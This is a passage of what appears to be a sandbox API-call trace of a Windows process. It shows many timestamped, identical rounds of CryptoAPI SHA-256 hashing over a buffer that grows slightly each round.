	[0154.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dde8
	[0154.896] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dde8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dde8, pdwDataLen=0x128aac) returned 1
	[0154.896] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.896] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.896] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.897] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.897] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0154.897] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.897] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230de10
	[0154.897] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230de10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230de10, pdwDataLen=0x128aac) returned 1
	[0154.897] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.897] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.897] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.897] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.897] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0154.897] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.897] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230de38
	[0154.897] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230de38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230de38, pdwDataLen=0x128aac) returned 1
	[0154.897] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.897] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.897] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.898] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.898] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0154.898] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.898] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230de60
	[0154.898] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230de60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230de60, pdwDataLen=0x128aac) returned 1
	[0154.898] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.898] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.898] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.898] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.898] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0154.898] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.898] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230de88
	[0154.898] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230de88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230de88, pdwDataLen=0x128aac) returned 1
	[0154.898] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.898] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.898] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.899] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.899] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0154.899] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230deb0
	[0154.899] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230deb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230deb0, pdwDataLen=0x128aac) returned 1
	[0154.899] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.899] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.899] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.899] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.899] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0154.899] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ded8
	[0154.899] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ded8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ded8, pdwDataLen=0x128aac) returned 1
	[0154.899] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.899] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.899] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.900] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.900] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0154.900] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.900] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230df00
	[0154.900] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230df00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230df00, pdwDataLen=0x128aac) returned 1
	[0154.900] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.900] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.900] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.900] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.900] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0154.900] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.900] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230df28
	[0154.900] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230df28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230df28, pdwDataLen=0x128aac) returned 1
	[0154.900] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.900] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.900] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.901] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.901] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0154.901] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.901] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230df50
	[0154.901] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230df50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230df50, pdwDataLen=0x128aac) returned 1
	[0154.901] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.901] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.901] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.901] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.901] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0154.901] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.901] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230df78
	[0154.901] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230df78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230df78, pdwDataLen=0x128aac) returned 1
	[0154.901] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.901] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.901] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.902] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.902] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0154.902] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.902] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dfa0
	[0154.902] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230dfa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dfa0, pdwDataLen=0x128aac) returned 1
	[0154.902] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.902] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.902] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.902] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.902] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0154.902] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.902] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310000
	[0154.902] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310000, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310000, pdwDataLen=0x128aac) returned 1
	[0154.902] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.902] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.902] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.903] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.903] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0154.903] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.903] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310028
	[0154.903] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310028, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310028, pdwDataLen=0x128aac) returned 1
	[0154.903] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.903] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.903] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.903] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.903] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0154.903] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.903] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310050
	[0154.903] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310050, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310050, pdwDataLen=0x128aac) returned 1
	[0154.903] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.903] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.903] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.904] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.904] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0154.904] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.904] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310078
	[0154.904] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310078, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310078, pdwDataLen=0x128aac) returned 1
	[0154.904] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.904] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.904] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.904] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.904] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0154.904] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.904] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23100a0
	[0154.904] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23100a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23100a0, pdwDataLen=0x128aac) returned 1
	[0154.904] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.904] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.904] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.905] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.905] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0154.905] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.905] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23100c8
	[0154.905] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23100c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23100c8, pdwDataLen=0x128aac) returned 1
	[0154.905] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.905] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.905] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.905] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.905] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0154.905] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.905] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23100f0
	[0154.905] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23100f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23100f0, pdwDataLen=0x128aac) returned 1
	[0154.905] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.905] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.905] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.906] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.906] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0154.906] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.906] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310118
	[0154.906] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310118, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310118, pdwDataLen=0x128aac) returned 1
	[0154.906] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.906] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.906] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.906] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.906] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0154.906] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.906] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310140
	[0154.906] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310140, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310140, pdwDataLen=0x128aac) returned 1
	[0154.906] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.906] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.906] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.907] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.907] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0154.907] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.907] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310168
	[0154.907] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310168, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310168, pdwDataLen=0x128aac) returned 1
	[0154.907] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.907] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.907] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.907] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.907] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0154.907] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.907] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310190
	[0154.907] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310190, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310190, pdwDataLen=0x128aac) returned 1
	[0154.907] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.907] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.907] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.908] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.908] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0154.908] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.908] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23101b8
	[0154.908] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23101b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23101b8, pdwDataLen=0x128aac) returned 1
	[0154.908] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.908] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.908] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.908] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.908] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0154.908] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.908] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23101e0
	[0154.908] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23101e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23101e0, pdwDataLen=0x128aac) returned 1
	[0154.909] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.909] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.909] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.909] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.909] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0154.909] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.909] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310208
	[0154.909] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310208, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310208, pdwDataLen=0x128aac) returned 1
	[0154.909] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.909] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
